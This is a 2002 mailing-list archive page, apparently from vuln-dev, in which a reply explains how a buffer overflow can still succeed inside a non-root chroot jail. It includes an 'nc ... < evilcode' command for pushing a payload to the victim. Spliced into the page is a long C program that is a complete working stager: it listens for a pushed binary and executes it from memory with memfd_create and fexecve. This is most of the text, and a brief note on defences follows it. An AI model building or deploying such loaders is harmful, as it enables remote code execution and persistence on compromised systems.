Sure it can. Just have the bootstrap code (the overflow) download a binary from the attacker's machine:

    nc victim_machine portnum < evilcode

Then exec the code. All the calls you need are in libc, which is almost certainly loaded by the overflowed program.

You have a chrooted, local account that can still be used as a zombie for attacks or masking your true location... (Or as a stepping stone for attacking more powerful accounts / machines on the local network.)

Adam

>From: Jason Haar <Jason.Haarat_private>
>To: vuln-devat_private
>Subject: OT? Are chroots immune to buffer overflows?
>Date: Wed, 22 May 2002 15:48:16 +1200
>
>[note: my question is WRT non-root chrooted jails - we all know about
>chroot'ing root processes!]
>
>Most buffer overflows I've seen attempt to infiltrate the system enough to
>run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist -
>so they fail.
>
>Is it as simple as that? As 99.999% of the system binaries aren't available
>in the jail, can a buffer overflow ever work?
>
>--
>Cheers
>
>Jason Haar
>
>Information Security Manager
>Trimble Navigation Ltd.
>Phone: +64 3 9635 377 Fax: +64 3 9635 417
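The stager Adam sketches, written out as an added example (this is not code from either mail). It needs nothing from the jail's filesystem: it listens on a port, takes whatever the attacker pushes with `nc victim_machine portnum < evilcode`, and executes the received bytes straight from memory. Everything it calls is libc or a raw syscall. The port number, the function names, the choice of memfd_create + fexecve as the "exec the code" step (a file written under the jail's cwd plus execve would do as well), and the fake payload used by the offline self-test are all assumptions made for this example.

```c
/* Added example: second-stage loader usable inside a non-root chroot that
 * has no /bin/sh. Build: cc -o stager stager.c   Run: ./stager 4444
 * Then from the attacker box:  nc victim_machine 4444 < evilcode          */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <unistd.h>

/* Explicit prototype/flag in case the headers were pulled in without
 * _GNU_SOURCE (glibc >= 2.27 provides memfd_create). */
int memfd_create(const char *name, unsigned int flags);
#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC 1U
#endif

/* Read fd to EOF into a malloc'd buffer of at most cap bytes. -1 on error. */
static ssize_t read_all(int fd, unsigned char **out, size_t cap)
{
    unsigned char *buf = malloc(cap);
    size_t len = 0;
    if (!buf) return -1;
    for (;;) {
        if (len == cap) { free(buf); return -1; }          /* stage too large */
        ssize_t n = read(fd, buf + len, cap - len);
        if (n < 0) { free(buf); return -1; }
        if (n == 0) break;                                  /* peer closed: done */
        len += (size_t)n;
    }
    *out = buf;
    return (ssize_t)len;
}

/* TCP listener on 0.0.0.0:port (0 = kernel-chosen); bound port via *bound. */
int listen_on(unsigned short port, unsigned short *bound)
{
    int s = socket(AF_INET, SOCK_STREAM, 0), one = 1;
    if (s < 0) return -1;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(s, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(s, 1) < 0) {
        close(s); return -1;
    }
    socklen_t sl = sizeof sa;
    if (bound && getsockname(s, (struct sockaddr *)&sa, &sl) == 0)
        *bound = ntohs(sa.sin_port);
    return s;
}

/* Accept one connection (the attacker's nc) and slurp the pushed stage. */
ssize_t receive_stage(int lsock, unsigned char **out, size_t cap)
{
    int c = accept(lsock, NULL, NULL);
    if (c < 0) return -1;
    ssize_t len = read_all(c, out, cap);
    close(c);
    return len;
}

/* Execute an ELF image from an anonymous memfd: no path inside the jail is
 * ever written. Returns -1 only on failure (fexecve does not return on success). */
int exec_stage(const unsigned char *stage, size_t len)
{
    int fd = memfd_create("stage", MFD_CLOEXEC);
    if (fd < 0) return -1;
    for (size_t off = 0; off < len; ) {
        ssize_t n = write(fd, stage + off, len - off);
        if (n <= 0) { close(fd); return -1; }
        off += (size_t)n;
    }
    char *const argv[] = { "stage", NULL }, *const envp[] = { NULL };
    fexecve(fd, argv, envp);
    close(fd);
    return -1;
}

/* Constructed payload for the offline self-test: ELF magic followed by junk,
 * so it is received intact but exec_stage() on it fails. Not a real binary. */
static const unsigned char kFakeStage[] = "\x7f" "ELF stub (constructed test payload)";

/* Offline self-test: play the attacker's nc over loopback against our own
 * listener. Returns the received length on a byte-exact match, else -1. */
int loopback_self_test(void)
{
    unsigned short port;
    int ls = listen_on(0, &port);
    if (ls < 0) return -1;
    int c = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (c < 0 || connect(c, (struct sockaddr *)&sa, sizeof sa) < 0) { close(ls); return -1; }
    (void)!write(c, kFakeStage, sizeof kFakeStage - 1);    /* nc ... < evilcode */
    close(c);                                              /* EOF ends the stage */
    unsigned char *got = NULL;
    ssize_t len = receive_stage(ls, &got, 1 << 16);
    close(ls);
    int ok = len == (ssize_t)(sizeof kFakeStage - 1) && memcmp(got, kFakeStage, (size_t)len) == 0;
    free(got);
    return ok ? (int)len : -1;
}

int main(int argc, char **argv)
{
    unsigned short bound, port = argc > 1 ? (unsigned short)atoi(argv[1]) : 0;
    int ls = listen_on(port, &bound);
    if (ls < 0) { perror("listen"); return 1; }
    fprintf(stderr, "waiting for stage on port %u\n", bound);
    unsigned char *stage = NULL;
    ssize_t len = receive_stage(ls, &stage, 16u << 20);
    if (len <= 0) { perror("receive"); return 1; }
    fprintf(stderr, "got %zd bytes, executing\n", len);
    exec_stage(stage, (size_t)len);
    perror("exec");
    return 1;
}
```

In a real overflow the "bootstrap" would be a few hundred bytes of shellcode calling the same socket/accept/read/memfd_create/execve sequence, not a compiled program; the C above shows which libc calls carry the whole attack and why the absence of /bin/sh in the jail does not stop it. The defender's counter is to deny the process what this needs (network egress/ingress from the jailed service, seccomp on memfd_create/execve, noexec mounts for anywhere it can write), not to rely on the emptiness of the jail.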
This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:58:15 PDT